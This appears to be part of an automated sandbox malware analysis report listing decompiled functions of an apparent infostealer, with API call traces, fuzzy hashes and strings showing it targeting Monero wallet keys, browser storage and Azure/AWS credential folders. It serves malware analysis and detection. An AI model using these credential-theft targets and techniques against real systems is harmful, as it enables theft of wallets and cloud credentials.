                                    • Opcode Fuzzy Hash: 2b0e2820d60f7f5bfcf1b3c306b278f9a601694c88a14e36671720407dda852b
                                    • Instruction Fuzzy Hash: 87F1D071904118AFCB24DF64DD48ADEB7B9EF48304F1481A9F929E3244EB30AE41DBA1
                                    Function 00F61F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61F9F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F61FAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61FDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F61FE3
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61FEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6200E
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6201A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F62042
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6204D
                                    • lstrlen.KERNEL32(00F91794), ref: 00F62058
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62075
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F62081
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F620AC
                                    • lstrlen.KERNEL32(?), ref: 00F620E4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62104
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F62112
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62139
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6214B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6216B
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F62177
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6219D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F621A8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F621D4
                                    • lstrlen.KERNEL32(?), ref: 00F621EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6220A
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F62218
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62242
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6227F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F6228D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F622B1
                                    • lstrcat.KERNEL32(00000000,00A9CF08), ref: 00F622B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F622F7
                                    • lstrcat.KERNEL32(00000000), ref: 00F62304
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6232D
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F62356
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62382
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F623BF
                                    • DeleteFileA.KERNEL32(00000000), ref: 00F623F7
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F62444
                                    • FindClose.KERNEL32(00000000), ref: 00F62453
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                    • String ID:
                                    • API String ID: 2857443207-0
                                    • Opcode ID: a224e364a99466cca434032921a7e4356ecfe12a051f531a0b7a44c9ae6baec7
                                    • Instruction ID: 792755f6796dc799ae998027b880ea891c53b2fd73b650ea064c4946cdaf2988
                                    • Opcode Fuzzy Hash: a224e364a99466cca434032921a7e4356ecfe12a051f531a0b7a44c9ae6baec7
                                    • Instruction Fuzzy Hash: 95E19371A11A0A9BDB61EFA4DD85A9E77B9BF44310F080038F915E7205DB38DD41EBA0
                                    Function 00F76410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76445
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76480
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F764AA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F764E1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76506
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7650E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76537
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FolderPathlstrcat
                                    • String ID: \..\
                                    • API String ID: 2938889746-4220915743
                                    • Opcode ID: adbe477a7cbe748ddc339b9bf37f05a49159afef46084c27c44ad08f037b5a78
                                    • Instruction ID: 58a0108be4adb9c5dc4e0302f98cdc001f8e9448e1623468b10325388973c2b5
                                    • Opcode Fuzzy Hash: adbe477a7cbe748ddc339b9bf37f05a49159afef46084c27c44ad08f037b5a78
                                    • Instruction Fuzzy Hash: E4F1B270D01A099BDB25EF74DC49AAE77B4AF44314F088139F829DB245DB38DC45EBA2
                                    Function 00F74370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F743A3
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F743D6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F743FE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74409
                                    • lstrlen.KERNEL32(\storage\default\), ref: 00F74414
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74431
                                    • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00F7443D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74466
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74471
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74498
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F744D7
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F744DF
                                    • lstrlen.KERNEL32(00F91794), ref: 00F744EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74507
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F74513
                                    • lstrlen.KERNEL32(.metadata-v2), ref: 00F7451E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7453B
                                    • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00F74547
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7456E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F745A0
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F745A7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74601
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7462A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74653
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7467B
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F746AF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                    • String ID: .metadata-v2$\storage\default\
                                    • API String ID: 1033685851-762053450
                                    • Opcode ID: b3f2ce0063c771ea0c60da39b327d87578abb394343e2451cfe96298ae88e3d2
                                    • Instruction ID: c880b1c51c176d8ce003fd15a3fe769c23ef226983cf51aed7e8e18785c6ecaf
                                    • Opcode Fuzzy Hash: b3f2ce0063c771ea0c60da39b327d87578abb394343e2451cfe96298ae88e3d2
                                    • Instruction Fuzzy Hash: 2AB1B770A116059BDB71EFB4DD49AAE77B8AF44314F084039F869D7241DB38EC41BBA2
                                    Function 00F757A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F757D5
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F75804
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75835
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7585D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F75868
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75890
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F758C8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F758D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F758F8
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7592E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75956
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F75961
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75988
                                    • lstrlen.KERNEL32(00F91794), ref: 00F7599A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F759B9
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F759C5
                                    • lstrlen.KERNEL32(00A9CFF8), ref: 00F759D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F759F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F75A02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75A2C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75A58
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F75A5F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75AB7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75B2D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75B56
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75B89
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75BB5
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F75BEF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75C4C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75C70
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2428362635-0
                                    • Opcode ID: 2fc37cc5c2e7347b8ac2cb676b3c7f8f519125cfa957b6ed47e055d51f607d91
                                    • Instruction ID: 2af2f04b158cf23dfbb97a807dd8c0c43feab42a72a1e172b1e77898556c2ac2
                                    • Opcode Fuzzy Hash: 2fc37cc5c2e7347b8ac2cb676b3c7f8f519125cfa957b6ed47e055d51f607d91
                                    • Instruction Fuzzy Hash: 1002C470E01A099FDB25EFA8C989AAE77B5AF44710F04813DF819D7240DB78DC45EB92
                                    Function 00F61190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F61120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F61135
                                      • Part of subcall function 00F61120: RtlAllocateHeap.NTDLL(00000000), ref: 00F6113C
                                      • Part of subcall function 00F61120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00F61159
                                      • Part of subcall function 00F61120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00F61173
                                      • Part of subcall function 00F61120: RegCloseKey.ADVAPI32(?), ref: 00F6117D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F611C0
                                    • lstrlen.KERNEL32(?), ref: 00F611CD
                                    • lstrcat.KERNEL32(?,.keys), ref: 00F611E8
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6121F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F6122D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61251
                                    • lstrcat.KERNEL32(00000000,00A99108), ref: 00F61259
                                    • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00F61264
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61288
                                    • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00F61294
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F612BA
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F612FF
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F6130E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61335
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6133D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61378
                                    • lstrcat.KERNEL32(00000000), ref: 00F61385
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F613AC
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00F613D5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61401
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6143D
                                      • Part of subcall function 00F7EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00F7EE12
                                    • DeleteFileA.KERNEL32(?), ref: 00F61471
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                    • String ID: .keys$\Monero\wallet.keys
                                    • API String ID: 2881711868-3586502688
                                    • Opcode ID: f903b1159e3f6b6e938271f988b45bc2186da864e1586a8d8e4eb139c642f53c
                                    • Instruction ID: 099f14d0b358f5ab061f178094fcb445ac88d022a0eed2c5e970bc57fc1974a7
                                    • Opcode Fuzzy Hash: f903b1159e3f6b6e938271f988b45bc2186da864e1586a8d8e4eb139c642f53c
                                    • Instruction Fuzzy Hash: 42A1A371E116099BCB21EFB4DD9AAAE77B9BF44310F084028F915E7241DB38DD41EBA1
                                    Function 00F7E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00F7E740
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00F7E769
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E79F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E7AD
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00F7E7C6
                                    • memset.MSVCRT ref: 00F7E805
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00F7E82D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E85F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E86D
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00F7E886
                                    • memset.MSVCRT ref: 00F7E8C5
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F7E8F1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E920
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E92E
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F7E947
                                    • memset.MSVCRT ref: 00F7E986
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$memset$FolderPathlstrcpy
                                    • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 4067350539-3645552435
                                    • Opcode ID: 1fc61a3d3e6075963b23057d4d9079709a70693896a88b6e4f0c5a8ea863d7d3
                                    • Instruction ID: 7bdf2e1499a3353bbc4147bb42abf97a2c11e1a7bb2ea699834cebb19f5afc6a
                                    • Opcode Fuzzy Hash: 1fc61a3d3e6075963b23057d4d9079709a70693896a88b6e4f0c5a8ea863d7d3
                                    • Instruction Fuzzy Hash: 8C715971E4021DABDB75EBA0DC46FED7378AF48300F0444A9B7299B1C0DBB4AE849B55
                                    Function 00F7ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32 ref: 00F7ABCF
                                    • lstrlen.KERNEL32(00A9DFC8), ref: 00F7ABE5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AC0D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7AC18
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AC41
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AC84
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7AC8E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7ACB7
                                    • lstrlen.KERNEL32(00F94AD4), ref: 00F7ACD1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7ACF3
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F7ACFF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AD28
                                    • lstrlen.KERNEL32(00F94AD4), ref: 00F7AD3A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AD5C
                                    • lstrcat.KERNEL32(00000000,00F94AD4), ref: 00F7AD68
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AD91
                                    • lstrlen.KERNEL32(00A9E070), ref: 00F7ADA7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7ADCF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7ADDA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AE03
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7AE3F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7AE49
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7AE6F
                                    • lstrlen.KERNEL32(00000000), ref: 00F7AE85
                                    • lstrcpy.KERNEL32(00000000,00A9DFE0), ref: 00F7AEB8
                                    Strings
                                    Memory Dump Source
